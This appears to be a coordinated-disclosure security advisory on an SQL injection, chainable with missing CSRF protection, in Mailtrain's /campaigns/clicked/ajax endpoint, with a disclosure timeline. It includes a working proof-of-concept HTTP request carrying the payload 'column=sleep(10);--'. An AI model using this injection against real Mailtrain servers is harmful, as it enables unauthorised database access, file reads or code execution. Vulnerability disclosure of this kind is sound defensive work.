SQL injection and missing CSRF protection may lead to Remote Code Execution (RCE) or arbitrary file read.
SQL injection in statsClickedSubscribersByColumn accessible from /campaigns/clicked/ajax
The user input
column is used without validation to format a SQL query. The following HTTP request triggers SQL injection. Note that the anti Cross Site Request Forgery (CSRF) token is absent. A specially crafted page may use a CSRF vulnerability against a logged-in Mailtrain user to perform the injection even if the attacker doesn’t have credentials.
POST /campaigns/clicked/ajax/1/gdgdg/stats HTTP/1.1 Host: 192.168.253.133:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: connect.sid=s%3AzxIehz7S0MFY1s3sP_7WxkFE6_yfHN8T.C3jcpEr1Ly1gAAnMRhELS0qiBJgBSCDV4ohkiuo1kj0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 19 column=sleep(10);--
This issue may lead to RCE or arbitrary file read. However an important pre-requisite is improperly configured database user settings. If the database user is correctly locked down it still may lead to denial of service or a timing based blind read. Authentication is not needed if the vulnerability is chained with CSRF.
Coordinated Disclosure Timeline
- 07/07/2020: Report sent to Vendor
- 21/07/2020: No reply. Asking for confirmation
- 21/07/2020: Vendor acknowledges that the SQL injection part was fixed on 13/07/2020
- 25/08/2020: CVE-2020-24617 assigned
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at
firstname.lastname@example.org, please include a reference to
GHSL-2020-132 in any communication regarding this issue.